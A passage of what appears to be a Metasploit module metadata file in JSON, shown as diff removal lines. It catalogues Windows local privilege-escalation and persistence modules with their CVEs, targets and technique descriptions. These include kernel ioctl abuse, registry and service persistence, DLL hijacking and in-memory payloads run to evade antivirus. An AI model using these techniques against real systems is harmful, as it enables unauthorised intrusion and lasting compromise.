"session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/novell_client_nicm": { - "name": "Novell Client 2 SP3 nicm.sys Local Privilege Escalation", - "fullname": "exploit/windows/local/novell_client_nicm", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-05-22", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a flaw in the nicm.sys driver to execute arbitrary code in\n kernel space. The vulnerability occurs while handling ioctl requests with code\n 0x143B6B, where a user provided pointer is used as function pointer. 
The module\n has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3.", - "references": [ - "CVE-2013-3956", - "OSVDB-93718", - "URL-http://www.novell.com/support/kb/doc.php?id=7012497", - "URL-http://pastebin.com/GB4iiEwR" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 7 SP1" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/novell_client_nicm.rb", - "is_install_path": true, - "ref_name": "windows/local/novell_client_nicm", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/novell_client_nwfs": { - "name": "Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation", - "fullname": "exploit/windows/local/novell_client_nwfs", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-06-26", - "type": "exploit", - "author": [ - "Ruben Santamarta", - "juan vazquez " - ], - "description": "This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel\n space. The corruption occurs while handling ioctl requests with code 0x1438BB,\n where a 0x00000009 dword is written to an arbitrary address. An entry within the\n HalDispatchTable is overwritten in order to execute arbitrary code when\n NtQueryIntervalProfile is called. 
The module has been tested successfully on\n Windows XP SP3 with Novell Client 4.91 SP4.", - "references": [ - "CVE-2008-3158", - "OSVDB-46578", - "BID-30001" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows XP SP3" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/novell_client_nwfs.rb", - "is_install_path": true, - "ref_name": "windows/local/novell_client_nwfs", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/nscp_pe": { - "name": "NSClient++ 0.5.2.35 - Privilege escalation", - "fullname": "exploit/windows/local/nscp_pe", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-10-20", - "type": "exploit", - "author": [ - "kindredsec", - "BZYO", - "Yann Castel (yann.castel " - ], - "description": "This module allows an attacker with an unprivileged windows account to gain admin access on windows system and start a shell.\n For this module to work, both the NSClient++ web interface and `ExternalScripts` features must be enabled.\n You must also know where the NSClient config file is, as it is used to read the admin password which is stored in clear text.", - "references": [ - "EDB-48360", - "EDB-46802" - ], - "platform": "Windows", - "arch": "x64", - "rport": 8443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/exploits/windows/local/nscp_pe.rb", - "is_install_path": true, - "ref_name": "windows/local/nscp_pe", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - 
"ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ntapphelpcachecontrol": { - "name": "MS15-001 Microsoft Windows NtApphelpCacheControl Improper Authorization Check", - "fullname": "exploit/windows/local/ntapphelpcachecontrol", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-09-30", - "type": "exploit", - "author": [ - "James Forshaw", - "sinn3r " - ], - "description": "On Windows, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)\n allows application compatibility data to be cached for quick reuse when new processes are\n created. A normal user can query the cache but cannot add new cached entries as the\n operation is restricted to administrators. This is checked in the function\n AhcVerifyAdminContext.\n\n This function has a vulnerability where it doesn't correctly check the impersonation token\n of the caller to determine if the user is an administrator. It reads the caller's\n impersonation token using PsReferenceImpersonationToken and then does a comparison between\n the user SID in the token to LocalSystem's SID. 
It doesn't check the impersonation level\n of the token so it's possible to get an identify token on your thread from a local system\n process and bypass this check.\n\n This module currently only affects Windows 8 and Windows 8.1, and requires access to\n C:\\Windows\\System\\ComputerDefaults.exe (although this can be improved).", - "references": [ - "MSB-MS15-001", - "CVE-2015-0002", - "OSVDB-116497", - "EDB-35661", - "URL-https://code.google.com/p/google-security-research/issues/detail?id=118" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 8 / Windows 8.1 (x86 and x64)" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ntapphelpcachecontrol.rb", - "is_install_path": true, - "ref_name": "windows/local/ntapphelpcachecontrol", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ntusermndragover": { - "name": "Microsoft Windows NtUserMNDragOver Local Privilege Elevation", - "fullname": "exploit/windows/local/ntusermndragover", - "aliases": [], - "rank": 300, - "disclosure_date": "2019-03-12", - "type": "exploit", - "author": [ - "Clément Lecigne", - "Grant Willcox", - "timwr" - ], - "description": "This module exploits a NULL pointer dereference vulnerability in\n MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n function does not effectively check the validity of the tagPOPUPMENU\n objects it processes before passing them on to MNGetpItemFromIndex(),\n where the NULL pointer dereference will occur.\n\n This module has been tested against Windows 7 x86 SP0 and SP1. 
Offsets\n within the solution may need to be adjusted to work with other versions\n of Windows, such as Windows Server 2008.", - "references": [ - "CVE-2019-0808", - "URL-https://github.com/exodusintel/CVE-2019-0808", - "URL-https://github.com/ze0r/cve-2019-0808-poc", - "URL-http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html", - "URL-https://blog.exodusintel.com/2019/05/17/windows-within-windows/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 7 x86" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ntusermndragover.rb", - "is_install_path": true, - "ref_name": "windows/local/ntusermndragover", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-os-restarts" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/nvidia_nvsvc": { - "name": "Nvidia (nvsvc) Display Driver Service Local Privilege Escalation", - "fullname": "exploit/windows/local/nvidia_nvsvc", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-12-25", - "type": "exploit", - "author": [ - "Peter Wintersmith", - "Ben Campbell " - ], - "description": "The named pipe, \\pipe\\nsvr, has a NULL DACL allowing any authenticated user to\n interact with the service. It contains a stacked based buffer overflow as a result\n of a memmove operation. 
Note the slight spelling differences: the executable is 'nvvsvc.exe',\n the service name is 'nvsvc', and the named pipe is 'nsvr'.\n\n This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.\n It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.", - "references": [ - "CVE-2013-0109", - "OSVDB-88745", - "URL-http://nvidia.custhelp.com/app/answers/detail/a_id/3288" - ], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/nvidia_nvsvc.rb", - "is_install_path": true, - "ref_name": "windows/local/nvidia_nvsvc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/panda_psevents": { - "name": "Panda Security PSEvents Privilege Escalation", - "fullname": "exploit/windows/local/panda_psevents", - "aliases": [], - "rank": 600, - "disclosure_date": "2016-06-27", - "type": "exploit", - "author": [ - "h00die ", - "Security-Assessment.com" - ], - "description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n When run, it checks a user writable folder for certain DLL files, and if any are found\n they are automatically run.\n Vulnerable Products:\n Panda Global Protection 2016 (<=16.1.2)\n Panda Antivirus Pro 2016 (<=16.1.2)\n Panda Small Business Protection (<=16.1.2)\n Panda Internet Security 2016 (<=16.1.2)", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/panda_psevents.rb", - "is_install_path": true, - "ref_name": 
"windows/local/panda_psevents", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/payload_inject": { - "name": "Windows Manage Memory Payload Injection", - "fullname": "exploit/windows/local/payload_inject", - "aliases": [ - "post/windows/manage/payload_inject" - ], - "rank": 600, - "disclosure_date": "2011-10-12", - "type": "exploit", - "author": [ - "Carlos Perez ", - "sinn3r " - ], - "description": "This module will inject a payload into memory of a process. If a payload\n isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID\n datastore option isn't specified, then it'll inject into notepad.exe instead.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/payload_inject.rb", - "is_install_path": true, - "ref_name": "windows/local/payload_inject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/persistence": { - "name": "Windows Persistent Registry Startup Payload Installer", - "fullname": "exploit/windows/local/persistence", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-10-19", - "type": "exploit", - "author": [ - "Carlos Perez ", - "g0tmi1k" - ], - "description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": 
[ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/persistence_image_exec_options": { - "name": "Windows Silent Process Exit Persistence", - "fullname": "exploit/windows/local/persistence_image_exec_options", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-06-28", - "type": "exploit", - "author": [ - "Mithun Shanbhag", - "bwatters-r7" - ], - "description": "Windows allows you to set up a debug process when a process exits.\n This module uploads a payload and declares that it is the debug\n process to launch when a specified process exits.", - "references": [ - "URL-https://attack.mitre.org/techniques/T1183/", - "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb", - "is_install_path": true, - "ref_name": "windows/local/persistence_image_exec_options", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/persistence_service": { - "name": "Windows Persistent Service Installer", - "fullname": "exploit/windows/local/persistence_service", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-10-20", - "type": "exploit", - "author": [ - "Green-m " - ], - "description": "This Module will generate and upload an executable to a remote host, next will make it a persistent 
service.\n It will create a new service which will start the payload whenever the service is running. Admin or system\n privilege is required.", - "references": [ - "URL-https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/persistence_service.rb", - "is_install_path": true, - "ref_name": "windows/local/persistence_service", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/plantronics_hub_spokesupdateservice_privesc": { - "name": "Plantronics Hub SpokesUpdateService Privilege Escalation", - "fullname": "exploit/windows/local/plantronics_hub_spokesupdateservice_privesc", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-08-30", - "type": "exploit", - "author": [ - "Markus Krell", - "bcoles " - ], - "description": "The Plantronics Hub client application for Windows makes use of an\n automatic update service `SpokesUpdateService.exe` which automatically\n executes a file specified in the `MajorUpgrade.config` configuration\n file as SYSTEM. 
The configuration file is writable by all users by default.\n\n This module has been tested successfully on Plantronics Hub version 3.13.2\n on Windows 7 SP1 (x64).", - "references": [ - "CVE-2019-15742", - "EDB-47845", - "URL-https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/powershell_cmd_upgrade": { - "name": "Windows Command Shell Upgrade (Powershell)", - "fullname": "exploit/windows/local/powershell_cmd_upgrade", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Ben Campbell " - ], - "description": "This module executes Powershell to upgrade a Windows Shell session\n to a full Meterpreter session.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/local/powershell_cmd_upgrade.rb", - "is_install_path": true, - "ref_name": "windows/local/powershell_cmd_upgrade", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - 
"exploit_windows/local/powershell_remoting": { - "name": "Powershell Remoting Remote Command Execution", - "fullname": "exploit/windows/local/powershell_remoting", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Ben Campbell " - ], - "description": "This module uses Powershell Remoting (TCP 47001) to inject payloads on target machines.\n If RHOSTS are specified, it will try to resolve the IPs to hostnames, otherwise\n use a HOSTFILE to supply a list of known hostnames.", - "references": [ - "CVE-1999-0504", - "OSVDB-3106" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2022-08-08 01:40:15 +0000", - "path": "/modules/exploits/windows/local/powershell_remoting.rb", - "is_install_path": true, - "ref_name": "windows/local/powershell_remoting", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter", - "shell" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ppr_flatten_rec": { - "name": "Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation", - "fullname": "exploit/windows/local/ppr_flatten_rec", - "aliases": [], - "rank": 200, - "disclosure_date": "2013-05-15", - "type": "exploit", - "author": [ - "Tavis Ormandy ", - "progmboy ", - "Keebie4e", - "egypt ", - "sinn3r ", - "Ben Campbell ", - "juan vazquez ", - "OJ Reeves" - ], - "description": "This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage\n of uninitialized data which allows to corrupt memory. 
At the moment, the module has\n been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.", - "references": [ - "CVE-2013-3660", - "EDB-25912", - "OSVDB-93539", - "MSB-MS13-053", - "URL-https://seclists.org/fulldisclosure/2013/May/91" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/ppr_flatten_rec.rb", - "is_install_path": true, - "ref_name": "windows/local/ppr_flatten_rec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ps_persist": { - "name": "Powershell Payload Execution", - "fullname": "exploit/windows/local/ps_persist", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-14", - "type": "exploit", - "author": [ - "RageLtMan ", - "Matt \"hostess\" Andreko" - ], - "description": "This module generates a dynamic executable on the session host using .NET templates.\n Code is pulled from C# templates and impregnated with a payload before being\n sent to a modified PowerShell session with .NET 4 loaded. The compiler builds\n the executable (standard or Windows service) in memory and produces a binary\n which can be started/installed and downloaded for later use. 
After compilation the\n PoweShell session can also sign the executable if provided a path the a .pfx formatted\n certificate.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ps_persist.rb", - "is_install_path": true, - "ref_name": "windows/local/ps_persist", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ps_wmi_exec": { - "name": "Authenticated WMI Exec via Powershell", - "fullname": "exploit/windows/local/ps_wmi_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-08-19", - "type": "exploit", - "author": [ - "RageLtMan " - ], - "description": "This module uses WMI execution to launch a payload instance on a remote machine.\n In order to avoid AV detection, all execution is performed in memory via psh-net\n encoded payload. Persistence option can be set to keep the payload looping while\n a handler is present to receive it. By default the module runs as the current\n process owner. 
The module can be configured with credentials for the remote host\n with which to launch the process.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/local/ps_wmi_exec.rb", - "is_install_path": true, - "ref_name": "windows/local/ps_wmi_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/pxeexploit": { - "name": "PXE Exploit Server", - "fullname": "exploit/windows/local/pxeexploit", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-08-05", - "type": "exploit", - "author": [ - "scriptjunkie" - ], - "description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing the payload on the hard drive of any Windows\n partition seen.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/local/pxeexploit.rb", - "is_install_path": true, - "ref_name": "windows/local/pxeexploit", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/local/razer_zwopenprocess": { - "name": "Razer Synapse rzpnk.sys ZwOpenProcess", - "fullname": "exploit/windows/local/razer_zwopenprocess", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-03-22", - "type": "exploit", - 
"author": [ - "Spencer McIntyre" - ], - "description": "A vulnerability exists in the latest version of Razer Synapse\n (v2.20.15.1104 as of the day of disclosure) which can be leveraged\n locally by a malicious application to elevate its privileges to those of\n NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler\n in the rzpnk.sys driver that passes a PID specified by the user to\n ZwOpenProcess. This can be issued by an application to open a handle to\n an arbitrary process with the necessary privileges to allocate, read and\n write memory in the specified process.\n\n This exploit leverages this vulnerability to open a handle to the\n winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by\n installing a hook to execute attacker controlled shellcode. This hook is\n then triggered on demand by calling user32!LockWorkStation(), resulting\n in the attacker's payload being executed with the privileges of the\n infected winlogon process. In order for the issued IOCTL to work, the\n RazerIngameEngine.exe process must not be running. This exploit will\n check if it is, and attempt to kill it as necessary.\n\n The vulnerable software can be found here:\n https://www.razerzone.com/synapse/. 
No Razer hardware needs to be\n connected in order to leverage this vulnerability.\n\n This exploit is not opsec-safe due to the user being logged out as part\n of the exploitation process.", - "references": [ - "CVE-2017-9769", - "URL-https://warroom.securestate.com/cve-2017-9769/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/razer_zwopenprocess.rb", - "is_install_path": true, - "ref_name": "windows/local/razer_zwopenprocess", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-service-restarts" - ], - "SideEffects": [ - "screen-effects" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": [], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/registry_persistence": { - "name": "Windows Registry Only Persistence", - "fullname": "exploit/windows/local/registry_persistence", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-07-01", - "type": "exploit", - "author": [ - "Donny Maasland " - ], - "description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n The payload will be installed completely in registry.", - "references": [], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/exploits/windows/local/registry_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/registry_persistence", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter", - "shell" - ], - 
"needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/ricoh_driver_privesc": { - "name": "Ricoh Driver Privilege Escalation", - "fullname": "exploit/windows/local/ricoh_driver_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-01-22", - "type": "exploit", - "author": [ - "Alexander Pudwill", - "Pentagrid AG", - "Shelby Pace" - ], - "description": "Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.", - "references": [ - "CVE-2019-19363", - "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2021-09-08 21:56:02 +0000", - "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb", - "is_install_path": true, - "ref_name": "windows/local/ricoh_driver_privesc", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "artifacts-on-disk" - ], - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "service-resource-loss" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/run_as": { - "name": "Windows Run Command As User", - "fullname": 
"exploit/windows/local/run_as", - "aliases": [], - "rank": 600, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Kx499", - "Ben Campbell " - ], - "description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default.\n Unless targeting a local user either set the DOMAIN, or specify a UPN user\n format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.\n\n A custom command line can be sent instead of uploading an executable.\n APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine\n respectively. See the MSDN documentation for how these two values interact.", - "references": [ - "URL-https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2022-06-29 19:18:47 +0000", - "path": "/modules/exploits/windows/local/run_as.rb", - "is_install_path": true, - "ref_name": "windows/local/run_as", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/s4u_persistence": { - "name": "Windows Manage User Level Persistent Payload Installer", - "fullname": "exploit/windows/local/s4u_persistence", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-01-02", - "type": "exploit", - "author": [ - "Thomas McCarthy \"smilingraccoon\" ", - "Brandon McCann \"zeknox\" " - ], - "description": "Creates a scheduled task that will run using service-for-user (S4U).\n This allows the scheduled task to run even as an unprivileged user\n that is not logged into the device. This will result in lower security\n context, allowing access to local resources only. 
The module\n requires 'Logon as a batch job' permissions (SeBatchLogonRight).", - "references": [ - "URL-http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/", - "URL-http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2023-05-25 12:45:30 +0000", - "path": "/modules/exploits/windows/local/s4u_persistence.rb", - "is_install_path": true, - "ref_name": "windows/local/s4u_persistence", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": null, - "actions": [] - }, - "exploit_windows/local/service_permissions": { - "name": "Windows Escalate Service Permissions Local Privilege Escalation", - "fullname": "exploit/windows/local/service_permissions", - "aliases": [], - "rank": 500, - "disclosure_date": "2012-10-15", - "type": "exploit", - "author": [ - "scriptjunkie", - "Spencer McIntyre", - "itm4n" - ], - "description": "This module attempts to exploit existing administrative privileges to obtain\n a SYSTEM session. If directly creating a service fails, this module will inspect\n existing services to look for insecure configuration, file or registry permissions that may\n be hijacked. It will then attempt to restart the replaced service to run the\n payload. 
This will result in a new session when this succeeds.", - "references": [ - "URL-https://itm4n.github.io/windows-registry-rpceptmapper-eop/", - "URL-https://birkep.github.io/posts/Windows-LPE/", - "CVE-2025-21293" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Exploit CVE-2025-21293" - ], - "mod_time": "2025-04-17 09:43:13 +0000", - "path": "/modules/exploits/windows/local/service_permissions.rb", - "is_install_path": true, - "ref_name": "windows/local/service_permissions", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ] - }, - "session_types": [ - "meterpreter" - ], - "needs_cleanup": true, - "actions": [] - }, - "exploit_windows/local/srclient_dll_hijacking": { - "name": "Windows Server 2012 SrClient DLL hijacking", - "fullname": "exploit/windows/local/srclient_dll_hijacking", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-02-19", - "type": "exploit", - "author": [ - "Erik Wynter" - ], - "description": "All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL\n hijacking due to the way TiWorker.exe will try to call the non-existent\n `SrClient.dll` file when Windows Update checks for updates. This issue can be\n leveraged for privilege escalation if %PATH% includes directories that are\n writable by low-privileged users. 
